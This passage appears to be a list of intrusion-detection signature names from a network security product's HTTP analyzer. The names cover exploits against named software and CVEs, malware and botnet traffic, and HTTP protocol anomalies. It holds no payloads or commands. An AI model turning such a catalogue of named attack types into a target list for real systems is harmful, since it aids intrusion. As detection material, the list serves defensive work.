HTTP_CSU-Symantec-Web-Gateway-Management-Console-Remote-Shell-Command-Execution
HTTP_CSU-SysAid-Help-Desk-Administrator-Account-Creation
HTTP_CSU-SysAid-Help-Desk-File-Disclosure
HTTP_CSU-SysAid-On-Premise-Directory-Traversal-CVE-2023-47246
HTTP_CSU-Syssfic-Trojan-Infection-Traffic
HTTP_CSU-System-File-Disclosure
HTTP_CSU-System-Management-Homepage-Command-Injection
HTTP_CSU-Tandberg-Directory-Traversal-File-Disclosure
HTTP_CSU-Taterf.B-Traffic
HTTP_CSU-Telerik-UI-File-Upload-CVE-2017-11317
HTTP_CSU-Telerik-UI-For-ASP.NET-Remote-Code-Execution
HTTP_CSU-Telesquare-Router-Command-Injection-Vulnerability-CVE-2021-46422
HTTP_CSU-TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45839
HTTP_CSU-TerraMaster_TOS_Remote_Code_Execution_CVE-2020-28188
HTTP_CSU-Thanksgiving-iTunes-Malware
HTTP_CSU-ThinkPHP-Local-File-Inclusion-CVE-2022-47945
HTTP_CSU-Thomson-TWG850-4-Unauthenticated-Backup-File-Access
HTTP_CSU-Tidserv-Bot-Traffic
HTTP_CSU-Titan-MFT-Server-Path-Traversal-Via-WebDAV-CVE-2023-45686
HTTP_CSU-Tomato-Trojan-Infection-Traffic
HTTP_CSU-Too-Large-URI-Scheme
HTTP_CSU-Totolink-Routers-Multiple-Command-Injection-Vulnerabilities
HTTP_CSU-TP-Link-Local-File-Disclosure-CVE-2015-3035
HTTP_CSU-Treasure-Data-Digdag-Getfile-Directory-Traversal
HTTP_CSU-Trend-Micro-Control-Manager-Download.php-Information-Disclosure
HTTP_CSU-Trend-Micro-Control-Manager-Threatdistributedtrail-Threatname-SQL-Injection
HTTP_CSU-Trend-Micro-Imsva-Management-Portal-Authentication-Bypass
HTTP_CSU-Trend-Micro-InterScan-Messaging-Widget-Information-Disclosure
HTTP_CSU-Trend-Micro-Iwsva-Reporthandler-Docmd-Command-Injection
HTTP_CSU-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Sync_Client_Info-Slink_Id-SQL-Injection
HTTP_CSU-Trend-Micro-Scanmail-File-Disclosure
HTTP_CSU-TrickBot-C2-Traffic
HTTP_CSU-Trihedral-Vtscada-Wap-Directory-Traversal
HTTP_CSU-Trihedral-Vtscada-Wap-Filter-Bypass
HTTP_CSU-Tstisapi-DLL-BOF
HTTP_CSU-TWiki-Configure-Script-TYPEOF-Parameter-Command-Execution-2
HTTP_CSU-Ubiquiti-Networks-AirOS-Remote-Command-Execution-CVE-2010-5330
HTTP_CSU-UltraVNC-Vnclog-Buffer-Overflow
HTTP_CSU-Unicode-LRO-Character
HTTP_CSU-Unicode-RLO-Character
HTTP_CSU-Unix-File-Deletion-In-URI
HTTP_CSU-Upload.cgi-Detect
HTTP_CSU-VBulletin-Forumdisplay-Php-Script-Execution
HTTP_CSU-VBulletin-PHP-Object-Injection
HTTP_CSU-VBulletin-Routestring-Unauthenticated-Remote-Code-Execution
HTTP_CSU-Version-Control-Configuration-Access
HTTP_CSU-Vertexnet-Bot-Activity
HTTP_CSU-VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-Buffer-Overflow
HTTP_CSU-VMware-Server-Directory-Traversal
HTTP_CSU-VMware-Vcenter-Arbitrary-File-Read
HTTP_CSU-VMware-Vcenter-Server-Psc-Dataaccesscontroller-Insecure-Deserialization
HTTP_CSU-VMware-Workspace-One-Authentication-Bypass-CVE-2022-31656
HTTP_CSU-Vundo-Traffic
HTTP_CSU-W32-Jorik-Sefnit
HTTP_CSU-W32-Jorik-Sefnit-2
HTTP_CSU-W32/MyWife.d@MM!M24-Activity
HTTP_CSU-Waledac-Bot-Traffic
HTTP_CSU-Wavlink-WN535K2-WN535K3-OS-Command-Injection
HTTP_CSU-Wayboard-Cgi-Directory-Traversal
HTTP_CSU-WebAPP-Apage-Command-Execution
HTTP_CSU-WebConnect-Wcp-User-Directory-Traversal
HTTP_CSU-WebHints-Command-Execution
HTTP_CSU-Webmin-Arbitary-File-Disclosure
HTTP_CSU-Website-Uploader-Exe-File-Import
HTTP_CSU-Website-Win-C-Sample-Exe-BOF
HTTP_CSU-Webster-HTTP-Server-Buffer-Overflow
HTTP_CSU-Western-Digital-Multiple-Routers-Information-Disclosure
HTTP_CSU-WIKID-2fa-Enterprise-Server-ADM_usrs.jsp-Cross-Site-Scripting
HTTP_CSU-WIKID-2fa-Enterprise-Server-Getdomainhash-Stored-Cross-Site-Scripting
HTTP_CSU-Windows-Base64-Decode-Command-In-URI
HTTP_CSU-Windows-Explorer-HTA-CLSID-System-Compromise-2
HTTP_CSU-Windows-Style-Absolute-Path-In-URI
HTTP_CSU-Wireshark-Insecure-Search-Path-Script-Execution
HTTP_CSU-Wordpress-10Web-Photo-Gallery-SQL-Injection
HTTP_CSU-Wordpress-Admin-Console-Access-Attempt
HTTP_CSU-Wordpress-BulletProof-Security-Backup-Disclosure
HTTP_CSU-Wordpress-Google-Maps-Plugin-SQL-Injection
HTTP_CSU-Wordpress-Google-Tag-Manager-Plugin-Reflected-Cross-Site-Scripting
HTTP_CSU-Wordpress-Modern-Events-Calendar-SQLi-Scanner
HTTP_CSU-Wordpress-My-Calendar-Plugin-My_calendar_rest_route-SQL-Injection
HTTP_CSU-Wordpress-Perfect-Survey-Plugin-SQL-Injection-CVE-2021-24762
HTTP_CSU-Wordpress-Plugin-Duplicator-Arbitrary-File-Read
HTTP_CSU-Wordpress-SEO-Plugin-Url-SQL-Injection
HTTP_CSU-Wordpress-Simple-File-List-Plugin-Path-Traversal
HTTP_CSU-Wordpress-Social-Warfare-Plugin-Remote-File-Inclusion
HTTP_CSU-Wordpress-Wp-Mobile-Detector-File-Upload-Vulnerability
HTTP_CSU-Wordpress-Wp-Statistics-Plugin-Gettop-Stored-Cross-Site-Scripting
HTTP_CSU-Wordpress-WPS-Hide-Login-Login-Page-Revealer
HTTP_CSU-XCSSET-Malware-Traffic
HTTP_CSU-Xerox-Docushare-Resultbackgroundjobmultiple-SQL-Injection
HTTP_CSU-Xupiter-Toolbar
HTTP_CSU-Xwiki.org-Xwiki-Importinline-Reflected-Cross-Site-Scripting
HTTP_CSU-Xwiki.org-Xwiki-Invitationguestactions-Code-Injection
HTTP_CSU-Xwiki.org-Xwiki-Platform-Flamingo-Theme-UI-Remote-Code-Execution
HTTP_CSU-Xwiki.org-Xwiki-Tags-Code-Injection
HTTP_CSU-Xymon-Useradm-Command-Execution
HTTP_CSU-YaBB-Cgi-Information-Retrieval
HTTP_CSU-YouPHPTube-Encoder-Getimage.php-Command-Injection
HTTP_CSU-YouPHPTube-Encoder-Getimagemp4.php-Command-Injection
HTTP_CSU-Zabbix-SQL-Injection
HTTP_CSU-ZeroAccess-Traffic
HTTP_CSU-Zeroboard-Multiple-File-Disclosure
HTTP_CSU-ZeroShell-Local-File-Disclosure
HTTP_CSU-Zeus-Web-Server-File-Read-Vulnerability
HTTP_CSU-Zeus-Zbot-Botnet-Checkin
HTTP_CSU-Zeus-Zbot-Botnet-Update
HTTP_CSU-Zimbra-Collaboration-Classic-Web-Client-Cross-Site-Scripting-CVE-2023-37580
HTTP_CSU-Zimbra-Collaboration-Cross-Site-Scripting-CVE-2022-27926
HTTP_CSU-Zimbra-Collaboration-Memcached-Command-Injection-In-Path-CVE-2022-27924
HTTP_CSU-Zimbra-Collaboration-Memcached-Command-Injection-In-Query-CVE-2022-27924
HTTP_CSU-Zimbra-Collaboration-Proxy-Servlet-SSRF-CVE-2024-45518
HTTP_CSU-Zimbra-Collaboration-Server-Local-File-Inclusion
HTTP_CSU-Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass
HTTP_CSU-Zoho-Manageengine-Applications-Manager-Masrequestprocessor-Serverid-SQL-Injection
HTTP_CSU-Zoho-Manageengine-Filestorage-Getchartimage-Insecure-Deserialization
HTTP_CSU-Zoho-Manageengine-Network-Configuration-Manager-Ping-Command-Injection
HTTP_CSU-Zoho-Manageengine-Opmanager-CVE-2022-29535-SQL-Injection
HTTP_CSU-Zoho-Manageengine-Opmanager-Failoverhelperservlet-Cross-Site-Scripting
HTTP_CSU-Zoho-Manageengine-Opmanager-Fluidicv2-UI-Directory-Traversal
HTTP_CSU-Zoho-Manageengine-Opmanager-Getdatacollectionfailurereason-SQL-Injection
HTTP_CSU-Zoho-Manageengine-Opmanager-Getgraphdata-SQL-Injection
HTTP_CSU-Zoho-Manageengine-Opmanager-Inventory-Reports-SQL-Injection
HTTP_CSU-Zoho-Manageengine-Opmanager-Opmdevicedetailsservlet-Category-SQL-Injection
HTTP_CSU-Zoho-Manageengine-Opmanagerdbutil-Getprobenatdetails-SQL-Injection
HTTP_CSU-Zoho-Manageengine-Password-Manager-Pro-GetVaraibleController-SQL-Injection
HTTP_CSU-ZyXEL-Chained-RCE-Using-LFI-And-Weak-Password-Derivation-Algorithm
HTTP_CSU-ZyXEL-NAS-Remote-Code-Execution-CVE-2024-29974
HTTP_CSU-ZyXEL-Remote-Code-Execution-CVE-2020-9054
HTTP_CSU-ZyXEL-Unauthenticated-Lan-Remote-Code-Execution
HTTP_CSU-ZyXEL-ZyWALL-USG-Appliance-Authentication-Bypass
HTTP_CSU_2Wire-Cross-Site-Request-Forgery
HTTP_CSU_Adware.MediaGet-Download-Site
HTTP_CSU_Alcatel-OmniPCX-Enterprise-Remote-Command-Execution
HTTP_CSU_Apache-Tapestry-ContextAssetRequestHandler-Information-Disclosure
HTTP_CSU_Basic-Analysis-And-Security-Engine-File-Include
HTTP_CSU_Family-Connections-CMS-Remote-Command-Execution
HTTP_CSU_FreePBX-Remote-Command-Execution
HTTP_CSU_GE-Fanuc-Real-Time-Portal-Sensitive-Information-Disclosure
HTTP_CSU_hinkAdmin-ModuleService.php-checkAllowDownload-Directory-Traversal
HTTP_CSU_Jenkins-CVS-Plugin-Cross-Site-Request-Forgery
HTTP_CSU_Junos-Pre-Authenticated-Reflected-XSS-On-Error-Page-CVE-2022-22242
HTTP_CSU_Microsoft-Exchange-Server-Elevation-Of-Privilege-Vulnerability-CVE-2022-41080
HTTP_CSU_MoinMoin-Remote-Code-Execution
HTTP_CSU_Open-Flash-Chart-Remote-PHP-Code-Execution
HTTP_CSU_Pandora-FMS-Authentication-Bypass
HTTP_CSU_PHP-Cgi-Remote-Code-Execution
HTTP_CSU_Phpmyadmin-Server_sync.php-Backdoor
HTTP_CSU_Pi3Web-ISAPI-Denial-of-Service
HTTP_CSU_Redmine-Bazaar-Repository-Adapter-Command-Execution
HTTP_CSU_Rompager-Rom0-Information-Disclosure
HTTP_CSU_SAP-Netweaver-As-Java-CRM-Remote-Code-Execution
HTTP_CSU_SHTTPD-POST-Request-Buffer-Overflow
HTTP_CSU_TYPO3-File-Disclosure
HTTP_CSU_VMware-Vcenter-Update-Manager-Directory-Traversal
HTTP_CS_Apache-Flink-FileUploadHandler-Arbitrary-File-Upload
HTTP_CS_Codesys-V3-Cmpwebserver-And-Cmpwebserverhandler-Heap-Buffer-Overflow
HTTP_CS_FusionPBX-Operator-Panel-Exec.php-Command-Execution
HTTP_CS_GE-Fanuc-Real-Time-Portal-Sensitive-Information-Disclosure
HTTP_CS_Log4j-Remote-Code-Execution
HTTP_CS_Log4j-Remote-Code-Execution-Environment-Variable-Leak
HTTP_CS_Log4j-Remote-Code-Execution-Evasion
HTTP_CS_Openemr-Backup.php-Command-Injection
HTTP_CS_qdPM-9.1-Authenticated-Arbitrary-PHP-File-Upload
HTTP_CS_ThinkPHP-Remote-Code-Execution
HTTP_CS_Wordpress-Download-Manager-Unauthenticated-Remote-File-Upload
HTTP_CS_Xstream-Library-Insecure-Xml-Deserialization-CVE-2021-39144
HTTP_Decompression-Error
HTTP_Decompression-GZip-Extra-Header
HTTP_Decompression-Ratio-Large
HTTP_Decompression-Stream-Error
HTTP_Display_User_Warning
HTTP_eCentrex-VOIP-Client-Component-ActiveX-Control-Buffer-Overflow
HTTP_EMF-Windows-Graphics-Rendering-Engine-BOF
HTTP_EMF-Windows-Graphics-Rendering-Engine-BOF-2
HTTP_EnjoySAP-kwedit-ActiveX-Control-Buffer-Overflow
HTTP_EnjoySAP-rfcguisink-ActiveX-Control-Buffer-Overflow
HTTP_Executable-File-Within-Downloaded-MS-OLE
HTTP_F-Prot-Anti-Virus-ACE-File-Denial-Of-Service
HTTP_F-Prot-Anti-Virus-CHM-File-Heap-Overflow
HTTP_Firefox-BMP-Parser-Buffer-Overflow
HTTP_Firefox-Cookie-Site-Bondary-Bypass
HTTP_Firefox-Executable-Image-Dragging-Vulnerability
HTTP_Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow
HTTP_Header-Binary
HTTP_Header-Name
HTTP_Header-No-Delimiter
HTTP_Header-No-Name
HTTP_Header-Strict
HTTP_Headerline-CR
HTTP_Headerline_LF
HTTP_Headerline_LFCR
HTTP_Headerline_LFCRLF
HTTP_Host
HTTP_Host-SNI-Mismatch
HTTP_HP-Software-Update-Tool-ActiveX-Control-File-Overwrite
HTTP_HTML-Tag-Detector
HTTP_Ie-Anchorclick-Style-File-Import
HTTP_Ie-HTTP-Equiv-Meta-Tag-DoS
HTTP_Ie-Showhelp-Double-Colon-System-Compromise
HTTP_Ie-Showhelp-Double-Slash-System-Compromise
HTTP_IE5-Filename-BOF
HTTP_IIS-IDQ-IDA-HTX-Access
HTTP_IIS-IDQ-IDA-HTX-Access-Unsuccess
HTTP_IIS-Unicode-Encoding
HTTP_Imagemagick-Psd-File-Channel-Buffer-Vulnerability-Download
HTTP_Imagemagick-Sgi-File-Malformed-BPC-Field-Handling-Buffer-Overflow
HTTP_Imagemagick-Sgi-File-Malformed-ZSIZE-Field-Handling-Buffer-Overflow
HTTP_Internet-Explorer-7-Navigation-Canceled-Page-Cross-Site-Scripting
HTTP_Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
HTTP_Internet-Explorer-Com-Object-System-Compromise
HTTP_Internet-Explorer-CreateTextRange-Vulnerability
HTTP_Internet-Explorer-DirectAnimation.DATuple-Com-Object-Memory-Corruption
HTTP_Internet-Explorer-Imjpcksid.dll-Com-Object-Memory-Corruption
HTTP_Internet-Explorer-JPEG-Rendering-Memory-Corruption
HTTP_Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability
HTTP_Internet-Explorer-Multiple-Com-Objects-System-Compromise
HTTP_Internet-Explorer-Nested-Object-Tag-Memory-Corruption
HTTP_Invalid-Header
HTTP_Invalid-Location
HTTP_Invalid-Server-Input
HTTP_Invalid-Server-Protocol-List
HTTP_Invisible-Inline-Frame
HTTP_Java-Web-Start-Jnlp-File-Argument-Injection
HTTP_JPG-Gdiplus-DLL-Comment-Buffer-Overflow
HTTP_Large-Header
HTTP_Libextractor-ASF-Heap-Buffer-Overflow
HTTP_Libextractor-Qt-Heap-Buffer-Overflow
HTTP_Macrovision-InstallShield-Update-Service-Isusweb.dll-Remote-Buffer-Overflow
HTTP_Malicious-Microsoft-Step-By-Step-Interactive-Training-Bookmark-Link-File
HTTP_McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-ExportSiteList-BOF
HTTP_McAfee-Subscription-Manager-ActiveX-Buffer-Overflow
HTTP_Method
HTTP_Microsoft-CAPICOM-Certificates-ActiveX-Control-Vulnerability
HTTP_Microsoft-Compiled-HTML-Help-Itss-Buffer-Overflow
HTTP_Microsoft-Embedded-Font-EOT-File-Reference
HTTP_Microsoft-Excel-Column-Record-Handling-Memory-Corruption
HTTP_Microsoft-Excel-Crafted-Url-Buffer-Overflow
HTTP_Microsoft-Excel-Embedded-Flash-Object-JavaScript-Code-Execution
HTTP_Microsoft-Excel-Malformed-Imdata-Record
HTTP_Microsoft-Excel-Malformed-Palette-Record-Memory-Corruption
HTTP_Microsoft-Excel-rtWindow1-Record-Handling-Code-Execution
HTTP_Microsoft-Excel-Version-Information-Handling-Code-Execution
HTTP_Microsoft-Excel-Workbook-Workspace-Designation-Handling-Code-Execution
HTTP_Microsoft-Help-Workshop-CNT-Help-Contents-Buffer-Overflow
HTTP_Microsoft-Help-Workshop-Hpj-Options-Section-Buffer-Overflow
HTTP_Microsoft-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
HTTP_Microsoft-Internet-Explorer-Content-Advisor-Memory-Corruption
HTTP_Microsoft-Internet-Explorer-Daxctle.ocx-Spline-Method-Buffer-Overflow
HTTP_Microsoft-Internet-Explorer-HTML-Help-Remote-Code-Execution
HTTP_Microsoft-Internet-Explorer-JavaScript-Page-Update-Race-Condition
HTTP_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
HTTP_Microsoft-Internet-Explorer-MHTML-URI-Buffer-Overflow
HTTP_Microsoft-Internet-Explorer-MHTML-Url-Processing-Vulnerability
HTTP_Microsoft-Internet-Explorer-Mismatched-DOM-Objects-Memory-Corruption
HTTP_Microsoft-Internet-Explorer-onUnload-Event-Memory-Corruption
HTTP_Microsoft-Internet-Explorer-VML-Buffer-Overrun
HTTP_Microsoft-Java-VM-Bytecode-Verifier-Bypass-JAR
HTTP_Microsoft-Jet-Db-Engine-Buffer-Overflow
HTTP_Microsoft-Management-Console-Cross-Site-Scripting
HTTP_Microsoft-Office-Drawing-Record-Msofbtopt-Code-Execution
HTTP_Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution
HTTP_Microsoft-PowerPoint-PPT-Document-Parsing-Exploit
HTTP_Microsoft-Visio-Version-Number-Handling-Code-Execution
HTTP_Microsoft-Visual-Basic-6.0-Vbp-Project-File-Handling-BOF
HTTP_Microsoft-Visual-Foxpro-Vfp6r.dll-Docmd-ActiveX-Control-Command-Execution
HTTP_Microsoft-Visual-Studio-WMI-Object-Broker-ActiveX-Control-Usage
HTTP_Microsoft-VM-ActiveX-Component-Vulnerability
HTTP_Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow
HTTP_Microsoft-Windows-Media-Player-ASX-Playlist-Parsing-Buffer-Overflow
HTTP_Microsoft-Windows-Resource-URI-Win32-API-Code-Execution-Vulnerability
HTTP_Microsoft-Windows-Shell-MSHTA-Script-Execution
HTTP_Microsoft-Word-For-Macintosh-Version-5-Document
HTTP_Microsoft-Word-Section-Table-Array-Buffer-Overflow
HTTP_Mimetype-Differs
HTTP_Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution
HTTP_Mozilla-Browsers-JavaScript-InstallVersion-Invalid-Argument-Type
HTTP_Mozilla-CSS-Moz-Binding-Cross-Site-Scripting
HTTP_Mozilla-Firefox-Chrome-Page-Privilege-Restriction-Bypass
HTTP_Mozilla-Firefox-CSS-Letter-Spacing-Heap-Overflow
HTTP_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
HTTP_Mozilla-Firefox-Privilege-Escalated-JavaScript-Execution
HTTP_Mozilla-Firefox-Unicode-Sequence-Handling-Buffer-Overflow
HTTP_Mozilla-IDN-Encoded-Hostname-BOF
HTTP_Mozilla-Products-Overflow-Event-Handling-Memory-Corruption
HTTP_Mozilla-Products-Regular-Expressions-Heap-Corruption
HTTP_Mozilla-Suite-DOM-Property-Code-Execution
HTTP_MPack-Invisible-Inline-Frame
HTTP_MPack-JavaScript-Decoder
HTTP_Multiple-Content-Compressions
HTTP_Multiple-Transfer-Compressions
HTTP_Not-HTTP-On-TCP
HTTP_Not-HTTP-On-TLS
HTTP_Nullsoft-Winamp-MP4-Files-Handling-Memory-Corruption
HTTP_OmniWeb-JavaScript-Alert-Format-String-Vulnerability
HTTP_OpenOffice.org-RTF-File-Parsing-Heap-Buffer-Overflow
HTTP_Overflow-Headers
HTTP_Panic-Transmit-Ftps-Url-Handler-Heap-Buffer-Overflow
HTTP_Pipelined-After-Connect
HTTP_Pipelined-After-Upgrade-Request
HTTP_PNG-Image-With-Large-Data-Length-Value
HTTP_PNG-Image-With-Large-Height-Or-Width-Value
HTTP_Protocol-Upgrade-Limit-Exceeded
HTTP_Proxy-Authentication-Error
HTTP_Proxy-Authentication-Required-With-Redirection
HTTP_Proxy-Connection-Timeout
HTTP_Proxy-DNS-Lookup-Error
HTTP_Proxy-Redirection-Failed
HTTP_ProZilla-FTPSearch-Buffer-Overflow
HTTP_PSH-Shared-Variables
HTTP_PSU-Shared-Variables
HTTP_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution
HTTP_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-2
HTTP_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-3
HTTP_RealNetworks-SMIL-Wallclock-Stack-Overflow
HTTP_RealPlayer-AVI-Parsing-Buffer-Overflow
HTTP_RealPlayer-RAM-File-Processing-Buffer-Overflow
HTTP_RealPlayer-Realpix-And-Realtext-Format-String-Compromise
HTTP_RealPlayer-SMIL-Screen-Size-System-Compromise
HTTP_Reply-Chunked-Encoded-Chunk-Unparseable
HTTP_Reply-Chunked-Encoding-Extra-Data-Before-Chunk-Header
HTTP_Reply-Chunked-Encoding-Negative-Chunk-Length
HTTP_Reply-Chunked-Encoding-No-Terminating-Chunk
HTTP_Reply-Connection-Unparseable
HTTP_Reply-Content-Length-Duplicate
HTTP_Reply-Content-Length-Unparseable
HTTP_Reply-Content-Length-With-Chunked-Encoding
HTTP_Reply-Content-Type-Missing
HTTP_Reply-Header-Line-Unparseable
HTTP_Reply-Status-Line-CR
HTTP_Reply-Status-Line-Unparseable
HTTP_Reply-Upgrade-Unparseable
HTTP_Reply-Without-Request
HTTP_Request-BITS-POST
HTTP_Request-CCM-POST
HTTP_Request-Chunked-Encoding-Chunk-Unparseable
HTTP_Request-Chunked-Encoding-Extra-Data-Before-Chunk-Header
HTTP_Request-Chunked-Encoding-Negative-Chunk-Length
HTTP_Request-Chunked-Encoding-No-Terminating-Chunk
HTTP_Request-CONNECT
HTTP_Request-Connection-Field-Unparseable
HTTP_Request-Content-Length-Duplicate
HTTP_Request-Content-Length-Unparseable
HTTP_Request-Content-Length-With-Chunked-Encoding
HTTP_Request-DELETE
HTTP_Request-Extra-Data
HTTP_Request-Filter
HTTP_Request-GET
HTTP_Request-HEAD
HTTP_Request-Header
HTTP_Request-Header-Line-Unparseable
HTTP_Request-Headers-Version-0.9
HTTP_Request-INDEX
HTTP_Request-Line-Unparseable
HTTP_Request-MKDIR
HTTP_Request-OPTIONS
HTTP_Request-Pipelined-No-Reply
HTTP_Request-Pipelined-Too-Many
HTTP_Request-POST
HTTP_Request-PUT
HTTP_Request-RMDIR
HTTP_Request-SEARCH
HTTP_Request-SMS-POST
HTTP_Request-TRACE
HTTP_Request-Unknown
HTTP_Request-Upgrade-Field-Unparseable
HTTP_Request-URI-Missing
HTTP_Request-Version-0.9
HTTP_Request-Version-1.0
HTTP_Request-Version-1.1
HTTP_Request-Version-Missing
HTTP_Request-Version-Not-Allowed
HTTP_Request-Version-Not-HTTP
HTTP_Request-Version-Unknown
HTTP_Request-WebDAV-BCOPY
HTTP_Request-WebDAV-BDELETE
HTTP_Request-WebDAV-BMOVE
HTTP_Request-WebDAV-BPROPFIND
HTTP_Request-WebDAV-BPROPPATCH
HTTP_Request-WebDAV-COPY
HTTP_Request-WebDAV-LOCK
HTTP_Request-WebDAV-MKCOL
HTTP_Request-WebDAV-MOVE
HTTP_Request-WebDAV-PROPFIND
HTTP_Request-WebDAV-PROPPATCH
HTTP_Request-WebDAV-REPORT
HTTP_Request-WebDAV-UNLOCK
HTTP_Request-with-redirect-capability
HTTP_Request-Without-Reply
HTTP_Response-Extra-Data
HTTP_Response-Header
HTTP_Response-Version-0-9
HTTP_Response-Version-HTTP
HTTP_Response-Version-Malformed
HTTP_SafeSearch-Rewrite
HTTP_SAP-GUI-ActiveX-Control-Buffer-Overflow
HTTP_SCH-Chunk-Extension
HTTP_SCH-Gnu-Wget-Skip_Short_Body-Stack-Buffer-Overflow
HTTP_SCH-HTML-In-Chunk-Extension
HTTP_SCH-Large-Chunk-Size
HTTP_SCH-Microsoft-HTTP-Services-And-Nginx-Chunked-Encoding-Vulnerabilities
HTTP_SCH-Non-Valid-Data-In-Chunk-Extension
HTTP_SCH-Non-Valid-Data-In-Chunk-Header
HTTP_SCH-Novell-iPrint-Client-For-Windows-IPP-Response-Stack-Buffer-Overflow
HTTP_SCH-Script-In-Chunk-Extension
HTTP_SCH-Shared-Variables
HTTP_SCH-Unusually-Large-Chunk-Extension
HTTP_Scripting.FileSystemObject-ActiveX-Object-Local-File-Write
HTTP_Separator
HTTP_Server-Boundary-String-Too-Long
HTTP_Server-Connect-OK
HTTP_Server-Content-Disposition-Without-Mandatory-Part
HTTP_Server-Content-Type-Without-Mandatory-Part
HTTP_Server-Decompression-Error-Incomplete-Data
HTTP_Server-Decompression-Error-No-Data
HTTP_Server-Decompression-Trailing-Data
HTTP_Server-Header-Name-Too-Long
HTTP_Server-Header-Name-Unparseable
HTTP_Server-Header-Value-Unparseable
HTTP_Server-Headers
HTTP_Server-Hostile-Use-of-Header-Line-Folding
HTTP_Server-MIME-Parameter-Syntax-Incorrect
HTTP_Server-Multipart-Delimiter-Use-Invalid
HTTP_Server-Multipart-No-Valid-Boundary-String
HTTP_Server-Multipart-Syntax-Error
HTTP_Server-Nested-Multipart-Message
HTTP_Server-Obsolete-Header-Line-Folding
HTTP_Server-Protocol-Upgraded
HTTP_Server-Side-Includes-In-Server-Reply
HTTP_Server-Syntax-Error
HTTP_Shared-Variables-For-Server-Ie-Stream-Context
HTTP_Shared-Variables-For-Server-Stream-Context
HTTP_Shell.Application-ActiveX-Object-Local-File-Execute
HTTP_SHS-Acceptable-Long-Headers
HTTP_SHS-Adobe-Acrobat-File-Extension-Buffer-Overflow
HTTP_SHS-Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read
HTTP_SHS-Apache-1.3-Mod_Proxy-Buffer-Overflow
HTTP_SHS-Apache-HTTP-Server-Mod_Cache-Denial-Of-Service
HTTP_SHS-Apache-Subversion-SVN-SSH-Url-Command-Execution
HTTP_SHS-Apache-Tomcat-Default-Servlet-Open-Redirect
HTTP_SHS-Apple-QuickTime-Plugin-Content-Type-Buffer-Overflow
HTTP_SHS-Bad-Newline-Before-Transfer-Encoding
HTTP_SHS-Bad-Newline-In-Headers
HTTP_SHS-BD-Wow32-Banner
HTTP_SHS-BitTorrent-Over-Port-80
HTTP_SHS-Brotli-Encoded-Content-Without-Client-Acceptance
HTTP_SHS-Brotli-In-Non-Standard-Port
HTTP_SHS-Campo-Downloader-Malware-Infection-Traffic
HTTP_SHS-Chunked-HTTP-1.0-Response
HTTP_SHS-Cisco-Webex-Teams-URI-Handler-Remote-Code-Execution
HTTP_SHS-Citadel-Botnet-Traffic
HTTP_SHS-Citrix-Access-Gateway-Plug-In-For-Windows-ActiveX-Control-BOF
HTTP_SHS-Clamav-Virusevent-Command-Injection
HTTP_SHS-Connection-Upgrade-Reply
HTTP_SHS-Connection-Upgraded-To-HTTP2
HTTP_SHS-Content-After-Zero-Content-Length
HTTP_SHS-Content-Encoding-Brotli
HTTP_SHS-Content-Encoding-With-Obsolete-Header-Folding
HTTP_SHS-Content-Encoding-X-Deflate
HTTP_SHS-Content-Type-Audio-Mpegurl
HTTP_SHS-Content-Type-Audio-Playlist
HTTP_SHS-Content-Type-Audio-Waveform
HTTP_SHS-Content-Type-Cascading-Style-Sheet
HTTP_SHS-Content-Type-Example
HTTP_SHS-Content-Type-JAR
HTTP_SHS-Content-Type-Text-CSV
HTTP_SHS-Content-Type-Text-HTML
HTTP_SHS-Content-Type-Text-Plain
HTTP_SHS-Content-Type-Unknown
HTTP_SHS-Content-Type-UTF-16-Big-Endian
HTTP_SHS-Content-Type-UTF-16-Little-Endian
HTTP_SHS-Content-Type-UTF-32-Big-Endian
HTTP_SHS-Content-Type-UTF-32-Little-Endian
HTTP_SHS-Content-Type-UTF-7
HTTP_SHS-Core-Services-Memory-Corruption-CVE-2010-2561
HTTP_SHS-Curl-And-Libcurl-Cookie-Path-Parsing-Remote-Code-Execution
HTTP_SHS-Curl-And-Libcurl-Ntlm-Type-3-Message-Creation-Stack-Based-Buffer-Overflow
HTTP_SHS-Data-URI-In-Redirect
HTTP_SHS-Deflate-Gzip-With-Extra-Header
HTTP_SHS-Double-CR-Before-Transfer-Encoding
HTTP_SHS-EICAR-AntiVirus-Test-File
HTTP_SHS-Electron-Setasdefaultprotocolclient-Command-Injection
HTTP_SHS-Electronic-Arts-Origin-Client-URI-Handler-Remote-Code-Execution
HTTP_SHS-Encoding-Header-Whitespace-Before-Colon
HTTP_SHS-ESSP-Connection-Reply
HTTP_SHS-Gnu-Wget-Cookie-Injection-Policy-Bypass
HTTP_SHS-Host-Header-Localhost
HTTP_SHS-HTTP-0.9-Response
HTTP_SHS-HTTP-Redirect-To-Non-HTTP-URI
HTTP_SHS-Icecast-Not-Audio
HTTP_SHS-Internet-Explorer-Content-Type-Buffer-Overflow
HTTP_SHS-Internet-Explorer-File-Name-Spoofing
HTTP_SHS-Invalid-Ascii-In-Content-Range-Header
HTTP_SHS-Invalid-Ascii-In-HTTP-Header
HTTP_SHS-Invalid-Content-Encoding-Header
HTTP_SHS-Invalid-CR-In-HTTP-Header
HTTP_SHS-Invalid-Response-HTTP-1.0
HTTP_SHS-Invalid-Response-HTTP-1.1
HTTP_SHS-Invalid-Server-Header-Ending
HTTP_SHS-Invalid-Value-After-HTTP-Version
HTTP_SHS-Invalid-Whitespace-Before-Transfer-Encoding-Header
HTTP_SHS-Large-Content-Length-Value
HTTP_SHS-Malwarebytes-Anti-Malware-URI-Handler-Remote-Code-Execution
HTTP_SHS-Microsoft-IIS-7.x-Server-Header
HTTP_SHS-Microsoft-Internet-Explorer-Deflate-Encoding-Memory-Corruption
